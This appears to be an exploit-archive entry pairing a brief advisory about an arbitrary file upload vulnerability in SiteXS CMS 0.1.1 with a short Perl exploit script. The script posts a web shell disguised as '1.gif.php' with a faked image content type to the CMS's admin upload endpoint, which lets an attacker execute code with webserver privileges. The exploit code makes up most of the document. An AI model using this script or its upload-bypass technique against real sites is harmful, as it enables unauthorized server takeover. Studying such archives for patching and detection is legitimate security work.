23 lines
No EOL
958 B
Perl
Executable file
23 lines
No EOL
958 B
Perl
Executable file
source: https://www.securityfocus.com/bid/29029/info
|
|
|
|
SiteXS is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code because the application fails to sanitize user-supplied input.
|
|
|
|
An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.
|
|
|
|
SiteXS CMS 0.1.1 Pre-Alpha is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/perl
|
|
# Author : Hadi Kiamarsi
|
|
# Discover By : Hadi Kiamarsi
|
|
# Exploit By : Hadi Kiamarsi
|
|
use LWP;
|
|
use HTTP::Request::Common;
|
|
$ua = $ua = LWP::UserAgent->new;;
|
|
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
|
|
Content_Type => 'form-data',
|
|
Content => [
|
|
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
|
|
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
|
|
],
|
|
);
|
|
print $res->as_string(); |